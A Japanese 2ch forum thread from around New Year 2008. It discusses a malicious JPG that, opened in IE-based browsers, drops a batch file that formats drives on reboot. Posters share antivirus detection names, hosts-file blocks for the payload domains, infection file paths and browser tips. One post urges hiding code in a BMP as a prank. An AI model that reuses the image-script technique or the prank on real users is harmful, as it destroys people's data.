踏むとフォーマットされるヤバイ画像対策専用スレ

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
誰か立てろよ
2名無しさん@お腹いっぱい。:2007/12/31(月) 15:50:01
      / ̄ ̄ ̄ ̄ ̄ ̄ \
/⌒ヽ  / ''''''     ''''''   ヽ
|  /   | (●),   、(●)   |
| |   |    ,,ノ(、_, )ヽ、,,     |
| |   |    `-=ニ=- '      |  
| |   !     `ニニ´      .!      天狗じゃ、これも天狗の仕業じゃ!
| /    \ _______ /
| |    ////W\ヽヽヽヽ\
| |   ////WWWヽヽヽヽヽヽヽ
| |  ////WWWWヽヽヽヽヽヽヽ
E⊂////WWWWWヽヽヽヽヽヽヽ
E////         ヽヽヽヽヽヽヽ
| |  //WWWWWWWヽヽヽヽヽヽヽ
3名無しさん@お腹いっぱい。:2007/12/31(月) 15:58:52
format D〜Z A B Cの順で効果的にふぉーまっと
ハードディスク全滅OTL

おれのパソコンは今、Sをフォーマット中・・・
みなさんさようなら・・・
4名無しさん@お腹いっぱい。:2007/12/31(月) 15:59:46
今日まで色々とありが
5名無しさん@お腹いっぱい。:2007/12/31(月) 16:01:21
>>3-4
逝っちゃたの?
6名無しさん@お腹いっぱい。:2007/12/31(月) 16:05:41
[ν速の転載]
概要まとめ
2007/12/30(日)、gigigi(アップローダー)にてエロ画像がUPされる。
画像にはアドレス(実行ファイルのスクリプトへの)が貼られており、これをクリックするとブラクラが発動、最終的にデスクトップにbatファイルをDLさせる。
再起動した瞬間に発動し、強制的にHDDをフォーマットする。
Internet Explorer系のレンダリングエンジンを使っているブラウザ(2chブラウザ)だと発動する。これはIEが画像ファイルをテキストやhtmlとして展開しようとするからである。

ギコナビ → ポップアップ → 死亡
Jane doe系 → 生存
Jane IE系 → 死亡
スレイプニル&unDonut等のIE系 → 死亡
火狐&オペラ等の非IE系、またはエンジン切り替え(Gecko等) → 生存
7名無しさん@お腹いっぱい。:2007/12/31(月) 16:27:16
アンチウイルスソフト対応状況
AntiVir ○
BitDefender
ノートン
ウィルスバスター
マカフィー
カスペルスキー ○ 検出名:Trojan-Downloader.JS.Agent.aqr
ウイルスキラー
Windows Live
Live one care
ウイルスセキュリティーZERO
avast!
AVG ○
キングソフト
NOD ○
F-Secure ○ 検出名:BAT/FORMATC.H
8名無しさん@お腹いっぱい。:2007/12/31(月) 16:50:29
俺のエロ漫画が消えたじゃないか
9名無しさん@お腹いっぱい。:2007/12/31(月) 17:35:20
>>6
IE系でいうとMaxthonも死亡だな。
10名無しさん@お腹いっぱい。:2007/12/31(月) 17:38:22
これ、いったい、何の攻撃なの??

・MS04-028を利用?
・MS04-028のような穴を新たに発見した0デイ?
・IE系ブラウザの実装の問題?
11名無しさん@お腹いっぱい。:2007/12/31(月) 17:42:44
常駐スレに何回か貼り付けてるやつがいるんだけど
こういうの犯罪にならないの?
12名無しさん@お腹いっぱい。:2007/12/31(月) 17:46:26
>>11 なるよ。器物損壊とか威力業務妨害とか。
13名無しさん@お腹いっぱい。:2007/12/31(月) 17:51:36
サンクス 
とりあえず通報してみる
14名無しさん@お腹いっぱい。:2007/12/31(月) 18:12:21
>>10
0Dayとかそんな大層なもんじゃなくて、ブラクラ詰め合わせ。
BATファイルをスタートアップへダウンロードさせて、なんか色々ダイアログ出て、再起動したらスタートアップと書き換わったAutoexecが実行されて
HDDが順番にフォーマットされるという単純なもの
15名無しさん@お腹いっぱい。:2007/12/31(月) 18:14:13
ついでに言っておくと今のところIE6だけだな。他のブラウザだと大丈夫。IE7でも問題なし。
JPGファイルがJavaScriptになってる古典的なやつだよ。
16名無しさん@お腹いっぱい。:2007/12/31(月) 18:15:33
再起動の命令を出すのも確か勝手にDLされるbatファイルだっけ
いわゆるformat c:\のやつかな?
17名無しさん@お腹いっぱい。:2007/12/31(月) 18:18:13
>>16
そそ、詳しくはν即にすれ立ってるからそこで様子見してくればいいよ。ただし、問題のJpgが結構貼ってある
から注意な。
18名無しさん@お腹いっぱい。:2007/12/31(月) 18:24:48
専用ブラウザとFirefoxで踏んだけど問題なかった
Operaも当然問題なかったし、やっぱりTridentエンジンが危険っぽいな
19名無しさん@お腹いっぱい。:2007/12/31(月) 18:26:58
まぁ要するにIE6使うなってことだな。IE6のコンポーネント使っているものでもダメだから注意な。
20名無しさん@お腹いっぱい。:2007/12/31(月) 19:40:19
HDDをフォーマットするブラクラ まとめwiki
ttp://www13.atwiki.jp/burakura_hdd/
21名無しさん@お腹いっぱい。:2007/12/31(月) 19:47:34
■一番簡単な対策(基本中の基本)■
 ツール→インターネットオプション
 セイキュリティ→
 インターネットゾーン・レベルのカスタマイズ
 →拡張子ではなく、内容によってファイルを開く
  ●無効
22名無しさん@お腹いっぱい。:2007/12/31(月) 19:48:07
カスペ先生愛してる
23名無しさん@お腹いっぱい。:2007/12/31(月) 19:48:52
カスペ先生を犯るのは俺だ!>>22には渡さん!
24名無しさん@お腹いっぱい。:2007/12/31(月) 19:49:58
> →拡張子ではなく、内容によってファイルを開く
この設定はないよな
25名無しさん@お腹いっぱい。:2007/12/31(月) 20:33:33
NOD系のスレにも書き込んだけど、NODは今回のトロイ、まだ対応してない気がする。

ESET Smart Security その4
http://pc11.2ch.net/test/read.cgi/sec/1197385178/676
> それ間違い。検出名がずっと気になってたんで今体験版で試したけど、NODじゃトロイ本体は検出できない感じ。
> (Virtual PCに体験版放り込んで、テストしてみた。)
>
> ブラクラ発動後にダウンロードされるウイルスの方を検出しているだけで、トロイ本体の方は、まだ対応してない?
>
> 何でかっていうと、N速に貼ってある今回のトロイのファイル、NODが入っていても(パターンファイル最新12/30版)、
> 普通にダウンロードできてしまうので...(カスペだとダウンロード時に検出されて引っかかる)
>
> なんで、NOD系の人はまだ注意した方が良いと思う。
26名無しさん@お腹いっぱい。:2007/12/31(月) 21:57:13
まさに今年の世相「偽」ブラクラ
27名無しさん@お腹いっぱい。:2007/12/31(月) 23:51:15
>>25
気がするも何も、そのスレにあるこの画像が未対応なことを証明してるんじゃ…

http://up2.viploader.net/upphp/src/vlphp114643.jpg

他の対応済みAVとは異なり、ESET系列がブロックしたと言ってるのは
問題のjpgではなく画像のスクリプト実行後にDLされるファイル
このファイルのDLに進むということから、問題のjpgはスルーなのが分かる
だから、亜種が出たり落ちてくる物によっては危ないかもな
28名無しさん@お腹いっぱい。:2008/01/01(火) 00:57:18
それっぽいの踏んだんだけど、画像が出てきただけでブラクラにはならなかったんだが大丈夫だよな?
29名無しさん@お腹いっぱい。:2008/01/01(火) 01:35:37
>>27
ん〜、やっぱりそうだよね。 Wikiで○ついてたけど、検出名が変だったので確かめてみたんだけどね。

俺の所で実際に検出させた結果では、確実に止められるのは今の所AVG,AntiVir,カスペの3つ。
この3つは、きっちり止められる。(元の1230.jpg自体をトロイとして検出して、隔離する。)

NODは止めきれない。F-Secureは不明。(今の所、俺の方ではテストできない)

今、Norton NAV2008の仮想環境作成中。テスト終わったら報告するわ。
30名無しさん@お腹いっぱい。:2008/01/01(火) 01:45:37
感染してない→対応
感染する→未対応

だろ
31名無しさん@お腹いっぱい。:2008/01/01(火) 01:52:43
未対応のavastスレどこ?
32名無しさん@お腹いっぱい。:2008/01/01(火) 02:16:16
>>30
今回のはトロイであってウイルスじゃないから、感染するかどうかってのは問題の本質とは違う。

トロイの実行を止められなければ、未対応と考えて良い。トロイが実行された結果ダウンロードされる
ウイルスに感染しないかどうかは、別の問題。 その辺を理解してない人が結構多い。

だから、オンラインスキャンで検査なんて、的外れな話が出てくる。

トロイは、基本、常駐型のウイルス対策ソフトじゃないと防げん。 トロイの中身によっては、実行された時点で
PCからファイルや情報抜かれる場合もあるんだし。 そんなん、後からオンラインスキャンかけたって手遅れ。
33名無しさん@お腹いっぱい。:2008/01/01(火) 02:30:45
F-Secureはバッチリ対応してる
参考までに分けて試した結果を貼っておきます
共に http://www.virustotal.com による解析の結果です
34名無しさん@お腹いっぱい。:2008/01/01(火) 02:31:17
・今回新登場のTrojan-Downloaderに反応する製品

AntiVir:TR/Dldr.Agent.aqr.20
AVG:Small.2.BJ
F-Secure:Trojan-Downloader.JS.Agent.aqr
Ikarus:Trojan-Downloader.JS.Agent.aqr
Kaspersky:Trojan-Downloader.JS.Agent.aqr
Sophos:Troj/Iframe-N
Webwasher-Gateway :Trojan.Dldr.Agent.aqr.20
35名無しさん@お腹いっぱい。:2008/01/01(火) 02:31:48
・Trojan-DownloaderがDLするフォーマット用BATファイルに反応する製品

AntiVir:HEUR/Trojan.DIRKiller
Authentium:BAT/FormatC.H
ClamAV:Trojan.Bat.DeltreeY-2
Fortinet:BAT/Deltree.gen!tr
F-Prot:BAT/FormatC.H
F-Secure:BAT/FormatC.H
NOD32v2:BAT/DeltreeY.AN
Rising:Trojan.BAT.FormatAll.c
TheHacker:Bat/Generic
36名無しさん@お腹いっぱい。:2008/01/01(火) 02:33:05
AntiVirとF-Secureが安心かもね
37名無しさん@お腹いっぱい。:2008/01/01(火) 03:32:26
namidame〜ってのを踏んだ気がするけど、今のところ何ともない。
必要な時以外JAVAを入れないようにしてるから助かったのでしょうか。
38名無しさん@お腹いっぱい。:2008/01/01(火) 03:34:33
>>29
>今、Norton NAV2008の仮想環境作成中。テスト終わったら報告するわ。

テスト終わった。残念ながら、NAV2008 + データベース 2007/12/31 では、1230.jpgをトロイとして認識しません。

今の所、トロイのリンク先のサーバーが落ちているのでウイルスのダウンロードは無いですが、
Norton系ユーザーの方は、引き続きご注意を。
39名無しさん@お腹いっぱい。:2008/01/01(火) 04:01:19
0x0のBMPファイル作って尻にコード入れてみ
すげー笑えると思うから
40名無しさん@お腹いっぱい。:2008/01/01(火) 04:19:38
>>33
>38の後、NAV2008をアンインストール → F-Secure評価版をインストールで確かめました。

F-Secureは、1230.jpgを Trojan-Downloader.JS.Agent.aqr として検知・隔離します。
ですので、F-Secureもきっちり止める組ですね。

防御成功時のパターンファイルは、2007-12-31_08 でした。
(多分、もっと前のパターンファイルから防御に成功していたと思われます。)

Wiki直して、寝ます。(w
41名無しさん@お腹いっぱい。:2008/01/01(火) 04:28:38
>>38
おつかれさまです
質問
ノートン先生はスクリプトを実行する前には反応しなかったのでしょうか?
お疲れのところスミマセン
42名無しさん@お腹いっぱい。:2008/01/01(火) 04:34:25
>>41
しませんでした。 と言っても、スクリプト自体が、ウイルス等のダウンロードサイトが落ちていて今はまともに動かないのですが。

なので、現状ではNortonは実際にウイルスファイルをダウンロードした時点での防御になると思われます。

とりあえず、スクリプトがダウンロードに行くサイトが復活するまでは、Nortonでも危険性は低いと思います。
まあ、早く対応はして欲しいところですけど。
43名無しさん@お腹いっぱい。:2008/01/01(火) 04:37:37
>>42
ありがとうございます
44名無しさん@お腹いっぱい。:2008/01/01(火) 04:40:17
2.3日前dailymotionに動画をうpしてる最中に大量の警告が出た
だから途中でうpを断念した。確かIEが強制終了
ちなみに以前はうpを成功させてる
なんか関係あんのかな


再起動についてだけど電源を切らずにスタンバイがデフォになってるのでまだそれ以降電源の入切はしてない
45__Mew__ ◆2SMew/3po. :2008/01/01(火) 05:33:46
じゃあ、今度はN先生に協力してもらいましょうか。
46名無しさん@お腹いっぱい。:2008/01/01(火) 06:00:03
wikiの対策のところの

ブラクラを仕込む〜.comにアクセスしないようにする
その1 PFWでcunt.multiservers.comをブロックする。
その2 \windows\system32\drivers\etc\hostsに
127.0.0.1 snipr.com
127.0.0.1 cunt.multiservers.com
書く。

IEの設定変更
C:\WINDOWS\system32\drivers\etc
にあるhostsファイルを書き換え。

ってのは信じrていいんだよな?
ホストってそこに通じるように設定するんじゃいのか?と思って疑ってしまう。
それと、ブラクラを仕込むとIEの設定変更のホストって違うの?
47名無しさん@お腹いっぱい。:2008/01/01(火) 06:28:27
>>46にある、PFWって何のこと?
48名無しさん@お腹いっぱい。:2008/01/01(火) 06:36:32
>>46
URLがhttp://snipr.comのときhttp://127.0.0.1にアクセスしるって設定だよ
127.0.0.1は自分のPC。

>>47
パーソナルファイアウォール
49名無しさん@お腹いっぱい。:2008/01/01(火) 06:40:59
Personal Firewall
50名無しさん@お腹いっぱい。:2008/01/01(火) 06:47:49
>>48
さんくす。設定してくる。
PFWもよく分かってないんだけど、avastのWebシールドのURLブロックに
cunt.multiservers.comを入れとけばいいのかな
51名無しさん@お腹いっぱい。:2008/01/01(火) 06:54:57
パーソナルファイアウォールってソフト名じゃなくて個人個人が使ってるファイアウォールソフトの総称でいいの?
52名無しさん@お腹いっぱい。:2008/01/01(火) 06:58:22
53名無しさん@お腹いっぱい。:2008/01/01(火) 07:18:05
普段からセキュリティに気をつけてる奴はこんなの引っかからないんだけどね。
54名無しさん@お腹いっぱい。:2008/01/01(火) 07:29:09
つーかIEコンポのブラウザ使わなければ関係ないってこと?
55名無しさん@お腹いっぱい。:2008/01/01(火) 07:33:19
画像の方はね
最終的に誘導される方はGeckoでも食らう気がする
56名無しさん@お腹いっぱい。:2008/01/01(火) 08:36:12
noscriptのアドオンいれてれば安全じゃね?
57名無しさん@お腹いっぱい。:2008/01/01(火) 08:52:50
FWの設定とかよく分からん人はとりあえずJavaScript切っとけばおk?
58名無しさん@お腹いっぱい。:2008/01/01(火) 09:06:52
カスペ&AVG最強伝説始まる
59名無しさん@お腹いっぱい。:2008/01/01(火) 09:09:01
そういや、おいらの職場。XP+IE6+バスターcorpしか認められてない。
4000人の社員がいるんだけどね。
1/4から営業開始です。
60名無しさん@お腹いっぱい。:2008/01/01(火) 09:11:38
こういうときもしっかりと対応するNOD最高!世界で一番人気あるのもわかるわ。
ノートンは糞、シマンテックはさっさと潰れろ。
61名無しさん@お腹いっぱい。:2008/01/01(火) 09:25:12
これって、アンチウイルス以外のソフトでも防げるんですか?
例えばwindows defenderでスタートアップの変更を監視とか。
System Safety Monitorで許可されてないプログラムは実行させないとか。
62名無しさん@お腹いっぱい。:2008/01/01(火) 09:54:52
ノートン バスター マカフィー
国内じゃ使用ユーザー数はこの3強だよな・・・

いい加減にしろ
63名無しさん@お腹いっぱい。:2008/01/01(火) 10:30:35
64名無しさん@お腹いっぱい。:2008/01/01(火) 12:02:33
>>63
これなんだろ?
IE7だとグーグルにいくし
火狐だと白いページ
65名無しさん@お腹いっぱい。:2008/01/01(火) 12:27:00
今更ですが、あけおめ。

>>63
・カスペではトロイの木馬 Trojan-Downloader.HTML.Agent.ir
・AVGでは、Trojan horse Small.2.BJ

として検出されます。(他のではテストしてません) 中身は、ulip00206.jpgの後半=1230.jpgなので、亜種と考えて良いのでは。

>>64
あんまり無防備に踏まない方が良いですよ。

-----

NAVのウイルス定義ファイルの更新があったので、>38の環境をコピーし直して(※ Virtual PCですので)
再度テストしてみましたが、1/1 10:00 時点でまだ駄目です。

その後、今度はNAV2008をアンインストール → avast!4をインストールで確かめました。
こっちも、1230.jpgはスルーしますので現時点で未対応です。(データベース 071231-0)

Norton,Avast!使用者は引き続きご注意下さい。
66名無しさん@お腹いっぱい。:2008/01/01(火) 12:51:49
>>65
おつかれサマ


ところでスクリプトの暗号化を解読する方法ってどうやるの
67名無しさん@お腹いっぱい。:2008/01/01(火) 15:09:50
これを機にプニル1.66から最新版に切り替え、Geckoエンジンを導入してみた
が…使い辛ぇえええええ…キーワード検索できないし変なふうに表示されるサイトあるし
プラグインとか探さないとだめなのかねこれは。そのままお手軽に使いたいのにまんどくせ…
68名無しさん@お腹いっぱい。:2008/01/01(火) 15:21:11
Sleipnirは1.66が軽いし十分な機能を持っている
2xxでGecko使うならFirefoxがマシだったよ
69名無しさん@お腹いっぱい。:2008/01/01(火) 15:24:40
個人的にはインスコ不要なSeaMonky勧める
70名無しさん@お腹いっぱい。:2008/01/01(火) 15:28:33
一応OperaとFirefoxも試したんだよね
Operaはダメだ・・・ニコ動で停止・再生でいやに重くなる。ニコ厨の俺には向かない。
Firefoxは、なんかそのままでも使えそうな気がしたけど生のままだと機能すげー少ないのね。
UIを改造しなきゃだめみたいなことがまとめに書いてあったが、スクリプトいじるとか大変そうだったから
プニルの最新版に逃げてみた。しかしこれまた使いづらい…
もうどうにもならねー。マジで困るトロイ作ってくれたもんだよ
71名無しさん@お腹いっぱい。:2008/01/01(火) 15:44:53
>>70
なんというか・・・全部慣れの問題じゃね?
ブラウザ乗り換えはいつも面倒なもんだよ
72名無しさん@お腹いっぱい。:2008/01/01(火) 15:48:04
その面倒を乗り越えた先にあるのが
Opera最強伝説というわけだよ
73名無しさん@お腹いっぱい。:2008/01/01(火) 15:50:05
OperaはノートンとケンカしてWin2kごと落とされた嫌な思い出が
74名無しさん@お腹いっぱい。:2008/01/01(火) 15:51:56
まあ今は安定したもんよ
75名無しさん@お腹いっぱい。:2008/01/01(火) 15:52:04
火狐は知らないけど、プニルはいいよ
慣れるとマウスカーソル全く動かさずにWeb閲覧やタブ飛びできるようになる
76名無しさん@お腹いっぱい。:2008/01/01(火) 15:53:24
そんなのOperaだって余裕
77名無しさん@お腹いっぱい。:2008/01/01(火) 15:53:52
Jane doe使いでほとんど2chしか見ない俺は安全だな
喜ぶべきか、悲しむべきかw
78名無しさん@お腹いっぱい。:2008/01/01(火) 15:56:34
画面がえらい暗く感じるんだけど
仕様?
79名無しさん@お腹いっぱい。:2008/01/01(火) 15:56:55
>>78
誤爆
80名無しさん@お腹いっぱい。:2008/01/01(火) 16:11:29
バスターは対応した?
ウイルスパターンファイルは今日も更新されたけど。
81名無しさん@お腹いっぱい。:2008/01/01(火) 17:03:19
だれかチェック出来るようなコードを書いてくれないかな。電卓が立ち上がるだけとかの。
いまいち自分の環境が大丈夫なのかワカラン。
82名無しさん@お腹いっぱい。:2008/01/01(火) 17:45:26
まず、携帯フルブラウザで見てオケそうだったらPC閲覧するとか
83名無しさん@お腹いっぱい。:2008/01/01(火) 17:45:55
それは何の意味もないだろう
84名無しさん@お腹いっぱい。:2008/01/01(火) 17:49:31
ようはIE6、またはIEコンポーネントのブラウザで開かなければいいってことだろ
85名無しさん@お腹いっぱい。:2008/01/01(火) 17:49:55
それもそうだな
ところでsymantecとtrendは現時点未対応でfixなんだよね?
86名無しさん@お腹いっぱい。:2008/01/01(火) 18:18:06
IE6で開いても大丈夫だったけど?
87名無しさん@お腹いっぱい。:2008/01/01(火) 18:21:17
javaスクリプトオフで防げる
88名無しさん@お腹いっぱい。:2008/01/01(火) 18:39:49
そういう問題じゃないw
89名無しさん@お腹いっぱい。:2008/01/01(火) 18:45:16
こんなのに引っかかる馬鹿なんているの?
90名無しさん@お腹いっぱい。:2008/01/01(火) 18:46:47
IEなんか使ってる奴なんているの?
91名無しさん@お腹いっぱい。:2008/01/01(火) 18:49:47
このトロイの仕組みが分からないんだけど
>>15
が答えでしょうか?単なる以前からある拡張子偽装って事?
92名無しさん@お腹いっぱい。:2008/01/01(火) 18:49:58
IEそのまま使ってる人が一番多いだろ

こういう板に居ても、IEコンポーネントのタブブラウザは沢山居るし
93名無しさん@お腹いっぱい。:2008/01/01(火) 18:51:25
つーか、脆弱性放置のMSが馬鹿
94名無しさん@お腹いっぱい。:2008/01/01(火) 18:53:49
スレイプニールでも大丈夫だった
95名無しさん@お腹いっぱい。:2008/01/01(火) 18:56:16
先月のWindowsうpだてのスレですら、IEが落ちるって騒いでたろ
プニルやDonut系は平気だっていうのに。

IE使ってるヤツはそんだけ多いんだよ
96名無しさん@お腹いっぱい。:2008/01/01(火) 19:16:35
要するに、GDATA最強って事?
97名無しさん@お腹いっぱい。:2008/01/01(火) 19:33:28
いいえ、キングです。
98名無しさん@お腹いっぱい。:2008/01/01(火) 19:37:32
今年の大晦日もまた独りぼっちだった・・・orz

俺・・・バイト後、2chでガキの使い実況
友・・・彼女と合体

親・・・高級料亭で食事
姉・・・年越し合コン
弟・・・彼氏とディズニーでお泊り

またお正月に家で一人お留守番する仕事が始まるお・・・
99名無しさん@お腹いっぱい。:2008/01/01(火) 19:42:36
>弟・・・彼氏とディズニーでお泊り
>弟・・・彼氏とディズニーでお泊り
100名無しさん@お腹いっぱい。:2008/01/01(火) 19:49:33
>>3の症状見てると、どうやら自分も踏んじまってるみたいだ;;
Dドライブだけフォーマットされちまったみたいなんだけど、それ以降のは何故か助かっている。
おそらく間にDVDドライブ挟んであったからなのかな?どっちにしてもDに溜め込んでたデータが
きれいに無くなってる模様。(パーティションだけ生成されてる?みたいでフォーマットして下さいと出る)

だれか助けてヽ(;´Д`)ノ
101名無しさん@お腹いっぱい。:2008/01/01(火) 19:52:03
おそらく、何処かの画像踏んで再起動掛けた時に「あれ?」って思ったんだよな。
これが確か25日以降の出来事・・・昨日まで気づかなかったのはご愛嬌で^^;
102名無しさん@お腹いっぱい。:2008/01/01(火) 19:53:33
>>100
finaldataとか復元製品試すしかないのでは?
上書き系消去じゃなくてformat系ってことだし
103名無しさん@お腹いっぱい。:2008/01/01(火) 19:59:32
レスサンクス
今フリーの奴でD:スキャン中・・・これ丸1日掛かりそうだな;;

で気になるんだけど、月額版バスターでIE7で踏んでるんだよね。
ひょっとしたら、IE設定とかデフォのままがいけなかった?
104名無しさん@お腹いっぱい。:2008/01/01(火) 20:12:03
わらた
105名無しさん@お腹いっぱい。:2008/01/01(火) 20:12:46
テストする環境を持ってる方がいたら、IEのセキュリティ設定で「拡張子ではなく、内容によってファイルを開くこと」って項目があるからそいつを無効にするにして踏んでみてくれない?
106名無しさん@お腹いっぱい。:2008/01/01(火) 20:20:34
IEやIEコンポのブラウザでしかもセキュリティ設定デフォのままホイホイ
正体不明の画像とか踏む奴がいること自体信じられない
107名無しさん@お腹いっぱい。:2008/01/01(火) 20:30:34
>>106
おそらく日本人の8割はそんなのだぞ
108名無しさん@お腹いっぱい。:2008/01/01(火) 20:31:39
視野狭窄なんだろうな
109名無しさん@お腹いっぱい。:2008/01/01(火) 20:37:06
水と安全はタダなのが日本のデフォ
110名無しさん@お腹いっぱい。:2008/01/01(火) 20:49:36
いいことじゃないか
111名無しさん@お腹いっぱい。:2008/01/01(火) 20:53:03
新年早々流出カップルいるけどなw
112名無しさん@お腹いっぱい。:2008/01/01(火) 21:16:38
>>98
このコピペは何度見ても・・・
1回で飽きる。
113名無しさん@お腹いっぱい。:2008/01/01(火) 21:28:00
義務教育課程でインターネットセキュリティの授業を組み込むべき
イヤまじで
114名無しさん@お腹いっぱい。:2008/01/01(火) 21:34:16
ていうかパソコンをオンラインにしてネットに晒す危険性についての
アナウンスがされてなさすぎだろ

「インターネットセキュリティ?ああ、うぃにー?で情報流出とかあったよね?
 でも私使ってないから多分だいじょうぶだしぃ
 え、インターネットオプション?何それ?ウイルス対策ソフト?
 あーなんかパソコンの電源つけた後画面の右下に変な警告出るねー、それがどうかしたの?」
こんぐらいの認識だろ、ガチで
115名無しさん@お腹いっぱい。:2008/01/01(火) 21:39:26
170 名前:名無しさん@八周年[sage] 投稿日:2008/01/01(火) 21:35:07 ID:QjT0BcVQ0
簡単な対策

System32のFORMAT.COMを消す

どうせ使わんよ
116名無しさん@お腹いっぱい。:2008/01/01(火) 22:01:18
まとめサイトを見ると、素早い対応だったのに無視されてるベンダーや
間違いが放置されたままでしたので、対応順にまとめてみました。
時間のある方が居れば、wikiの空欄を埋めて頂きたいです
117116:2008/01/01(火) 22:02:18
ヒューリスティック
 Webwasher-Gateway JavaScript.CodeUnfolding.gen!High (suspicious)
12月29日
 Sophos Troj/Iframe-N
12月30日
 AVG Small.2.BJ
12月31日
 AntiVir TR/Dldr.Agent.aqr.20
 F-Secure Trojan-Downloader.JS.Agent.aqr
 G DATA Trojan-Downloader.JS.Agent.aqr
 Ikarus Trojan-Downloader.JS.Agent.aqr
 Kaspersky Trojan-Downloader.JS.Agent.aqr
 Webwasher-Gateway :Trojan.Dldr.Agent.aqr.20 ←定義ファイルでも対応
01月01日
 現在のところなし?
118名無しさん@お腹いっぱい。:2008/01/01(火) 22:06:42
avastも昨日(31日)更新あったけど
これに対応してるのかは知らないな。
119名無しさん@お腹いっぱい。:2008/01/01(火) 22:08:44
アバストはしてないってさ
120名無しさん@お腹いっぱい。:2008/01/01(火) 22:09:05
>>115
それってドライブのフォーマットできなくなるわけだよね?
後からそのファイル復帰することってできんの?
できるんだったら別のドライブにそのファイル退避しといて使うときだけ戻せば最強じゃね?
121名無しさん@お腹いっぱい。:2008/01/01(火) 22:13:19
wiki見てきたけど、俺が引っ掛かったのは亜種だったのかなぁ・・
あんな派手に警告やらポップアップしなかったし、ただ再起動した時におかしいなと思ったくらいでさ。
122名無しさん@お腹いっぱい。:2008/01/01(火) 22:31:09
>>120
それ言い出したら、結局のところ、
TrueImageなどを使ったフルバックアップが最強じゃね?

こういうのは触れないのが基本だぜ。

万一、触れちゃったときは不安を抱えたまま使い続けるよりも、
OS再インストールorバックアップから復元、こそが最強。

備えあれば憂いなし、だ!
123名無しさん@お腹いっぱい。:2008/01/01(火) 22:38:30
NISとAntiVir常駐させてても平気でぶち抜いて来る奴がいるのに無防備な奴多すぎ
124名無しさん@お腹いっぱい。:2008/01/01(火) 22:39:02
>>122
いや、フルバックアップは普段からするものだろ。
でも復旧には時間かかるからしたくないだろ。
フォーマットできなくしとけばトロイ削除して問題なくなった後ファイル戻せば済む話だろ。
そのほうが楽だろ。つーかなんで触れちゃだめなんだ?
125名無しさん@お腹いっぱい。:2008/01/01(火) 22:41:39
ノートン、バスター、マカフィーの御三家が
全く役立たずだった事が判明

フリーにも劣るとは・・・
126名無しさん@お腹いっぱい。:2008/01/01(火) 22:43:46
この画像踏んでフォーマットされたって人いるの?















ざまぁwwwwwww
127名無しさん@お腹いっぱい。:2008/01/01(火) 22:52:17
そういえば最近AVGでトロイ警告が出たな
128名無しさん@お腹いっぱい。:2008/01/01(火) 22:59:32
結局フリーのAVG入れてた俺は勝ち組www
金出してても役に立たないのは立たないねw
129名無しさん@お腹いっぱい。:2008/01/01(火) 23:00:37
http://internet.watch.impress.co.jp/cda/news/2006/12/01/14107.html
サイトを見る前に、URLから運営者情報を確認できる「aguse」

 Webシステム構築を手掛けるブイモールは1日、メールなどに記載されたリンク先のURLを入力することで、
サイト情報を調べられるサービス「aguse(ベータ版)」を公開した。利用は無料。
 aguseでは、調べたいサイトのURLを入力するだけで、当該サイトのIPアドレスや逆引きホスト名、
スクリーンショット画像などを確認できる。これにより、初めてアクセスするサイトの内容を事前にチェックできる。
 また、Googleマップを利用したサーバーの位置情報や詳しいドメイン・管理者情報のほか、企業や団体が
提供するフィッシングサイトブラックリストとも照合できる。なお、サイトによっては情報の取得に時間を要する場合もある。
 ブイモールは、「とりあえず手元にある技術を使って、便利なサイトを作ってみた。今のところ収益は考えていない」と
コメント。今後は、届いたメールの送信経路が調べられる機能を2007年1月に追加。さらに、aguseに蓄積した情報を元に
照合できるデータベース機能などを予定する。

(2007/12/17) http://www.aguse.nethttp://www.aguse.jp として正式に運用を再開しました。
お手数ですがブックマークの変更をお願いいたします。

サイトを見る前に、URLから運営者情報を確認できるサイト
http://news20.2ch.net/test/read.cgi/news/1164969914/
130名無しさん@お腹いっぱい。:2008/01/01(火) 23:39:31
JaneDoeStyleのビューアで踏んでしまった…

AVGで検索して何も引っかからないんだけど
再起動して大丈夫かね?
131名無しさん@お腹いっぱい。:2008/01/01(火) 23:44:14
スタートアップ見ておけ
怪しいbatファイルがあれば手動削除で
132名無しさん@お腹いっぱい。:2008/01/01(火) 23:44:27
要するにフォーマットされちまったら、リカバリ、再インストってことなの?
つーか、それで元に戻るなら・・・。
133名無しさん@お腹いっぱい。:2008/01/01(火) 23:46:13
>>130

570 名前:名無しさん@八周年[] 投稿日:2007/12/31(月) 07:34:28 ID:UpN/oKQ90
>>562
感染確認
心配な人、↓にbatファイルが無ければおk

スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\スタート メニュー\プログラム\スタートアップ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat

AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt

クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat
134名無しさん@お腹いっぱい。:2008/01/01(火) 23:50:17
>>131
>>133
サンクス
隠しファイル表示ONにして見てみたけど何も無かった。
Doe系だったからセーフなのかな。
135名無しさん@お腹いっぱい。:2008/01/02(水) 00:23:33
35 :名無し募集中。。。 :2008/01/01(火) 20:39:41.15 0
>>1
バスターの性能を試したくてあえて踏んだ
例によってブラクラ発動
バスターは無警告、無反応で使えない事が判明
再起動したけど何もなし

翌日起動したら、マイコンピュータのDVDアイコンが消えて
DVDが利用できなくなった
他にも異常が多数発生

レジストリが書き換えられていた模様
システム復元で元通り復旧

705 名前:名無し募集中。。。 [] 投稿日:2008/01/01(火) 23:38:44.79 0
マイコンピュータから
DVDドライブのアイコンが両方とも消えている・・・
おかしいと思って
デバイスマネージャで見たら
DVDの所に「!」マークが・・・

で更にプロセッサの所に「!」
どうしたら、いいんでしょうか?

748 名前:名無し募集中。。。 [] 投稿日:2008/01/02(水) 00:05:36.64 O    New!!
うちのパソもDVDやられてて
なんか踏んでたのかノートン反応無かったお

724 名前:名無し募集中。。。 [] 投稿日:2008/01/01(火) 23:50:49.65 0    New!!
実際にHDDまでいかれた奴いるのかな?
今のところは>>35>>705みたいにDVD使えなくなる程度の被害だけっぽい
136名無しさん@お腹いっぱい。:2008/01/02(水) 00:27:30
>>115
